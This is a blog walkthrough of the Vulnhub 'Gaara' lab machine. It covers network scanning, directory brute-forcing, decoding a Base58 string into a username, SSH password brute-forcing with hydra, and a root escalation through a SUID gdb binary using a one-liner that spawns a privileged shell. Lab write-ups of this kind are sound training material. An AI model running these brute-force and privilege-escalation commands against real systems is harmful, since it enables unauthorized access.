NepCodeX


Gaara Walkthrough – Vulnhub – Writeup

Gaara by 0xJin is an easy machine from Vulnhub. However, there are some rabbit holes along the way. I tested this machine on VirtualBox.

Link to the machine: https://www.vulnhub.com/entry/gaara-1,629/

Identify the target

As usual, we have to identify the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, we have to scan the open ports on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.62

This is a simple machine that has HTTP and SSH services available.

Enumerate the web server

The default page had an image and nothing more.

Thus, we have to try bruteforcing the directories.

gobuster dir -u http://10.0.2.62 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log

There is an interesting path that we need to check.

There are three paths to check again. So, I looked at them one by one. All of them contained long texts. Hence, I decided to get unique words from them.

curl http://10.0.2.62/iamGaara | grep -oE '\w+' | sort -u -f | more

The path /iamGaara gave me an encoded text that I could decode using CyberChef. The text contains lowercase letters and the digits 1 and 9, none of which are in the Base32 alphabet, so we can confirm this is not Base32. Testing for Base58 gave me credentials.
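
The alphabet check described above, as an added example that is not part of the original writeup: it lists which of Base32, Base58 and Base64 a string could be from its characters alone, then decodes with each candidate and keeps the printable results. The Bitcoin Base58 alphabet is an assumption, and the sample string is constructed, not the one served by the machine.

```python
import base64

# Bitcoin Base58 alphabet (assumed): digits and letters minus the look-alikes 0, O, I, l.
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
ALPHABETS = {
    "base32": set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567="),  # RFC 4648
    "base58": set(B58),
    "base64": set(B58 + "0OIl+/="),
}

def candidates(text):
    """Encodings whose alphabet contains every character of text."""
    return [name for name, alpha in ALPHABETS.items() if set(text) <= alpha]

def b58encode(data):
    n, out = int.from_bytes(data, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    # Each leading zero byte is written as a leading '1'.
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + out

def b58decode(text):
    n = 0
    for ch in text:
        n = n * 58 + B58.index(ch)  # ValueError if ch is outside the alphabet
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return b"\x00" * (len(text) - len(text.lstrip("1"))) + body

DECODERS = {
    "base32": base64.b32decode,
    "base58": b58decode,
    "base64": lambda s: base64.b64decode(s, validate=True),
}

def triage(text):
    """Decode with every candidate; keep only printable-ASCII results."""
    text, results = text.strip(), {}
    for name in candidates(text):
        try:
            raw = DECODERS[name](text)
        except ValueError:  # bad padding or length for this encoding
            continue
        if raw and all(32 <= b < 127 for b in raw):
            results[name] = raw.decode("ascii")
    return results

# Constructed sample, not the string from the target machine.
SAMPLE = b58encode(b"demo_user:Not-A-Real-Secret")

if __name__ == "__main__":
    print(SAMPLE, candidates(SAMPLE), triage(SAMPLE))
```
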

However, this didn’t work on the SSH server. Still, we have a username whose password we can brute-force.

hydra -l gaara -P /home/kali/rockyou.txt  10.0.2.62 ssh

Finally, I got a password. Then, I got shell access as the user.

ssh [email protected]

Root privilege escalation

In the directory, there is a file Kazekage.txt that contains a path. This is a rabbit hole, but let’s see.

In the directory, there is a secret file.

There is a brainf*ck encoded text that reads the following.

Next, I checked the SUID binaries on the system.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

The gdb binary has the setuid bit set. Hence, we can escalate privileges from here.

Reference: https://gtfobins.github.io/gtfobins/gdb/#suid

gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit

Finally, we got a bash shell with root access. Next, we have the root flag.
